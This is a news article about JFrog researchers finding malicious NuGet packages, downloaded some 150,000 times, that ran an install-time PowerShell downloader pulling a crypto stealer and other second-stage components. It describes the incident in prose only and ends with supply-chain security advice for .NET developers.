Threat actors have recently been observed using the open source package manager NuGet to create malicious packages targeting .NET developers. This discovery marks the first instance of malicious code found in NuGet packages in the wild, according to software package management company JFrog.
Shachar Menashe, senior director at JFrog Security Research, highlighted the significance of this finding, stating, “For the first time, the NuGet repository – once thought to be untouched by malicious code – actually contains several harmful software packages designed to run automatically and often connected to further infected dependencies. This proves that no open source repository is safe from malicious actors.”
The malicious packages identified by JFrog security researchers Natan Nehorai and Brian Moussalli were downloaded a staggering 150,000 times over the past month. These packages contained a ‘download & execute’ payload, specifically a PowerShell script that would execute upon installation and trigger the download of a more sophisticated second-stage payload. This second-stage payload includes a crypto stealer, an Electron archive extractor supporting code execution, and an auto-updater.
Upon notifying NuGet administrators of the malicious packages, the JFrog security experts were informed that the packages had been removed. However, Menashe emphasized that .NET developers remain at high risk of encountering malicious code, as the observed NuGet packages still have the capability to run code upon installation.
Even though the malicious packages have been removed, Menashe advised .NET developers to exercise caution when selecting open-source components for their builds. He stressed the importance of maintaining a secure software supply chain throughout the software development lifecycle.
For more insights on securing open source software, readers can refer to an analysis by OpenUK CEO, Amanda Brock.
Overall, the incident involving malicious NuGet packages serves as a stark reminder of the persistent threats faced by developers in the open source ecosystem. It underscores the importance of vigilance and proactive security measures to safeguard against malicious actors targeting software repositories.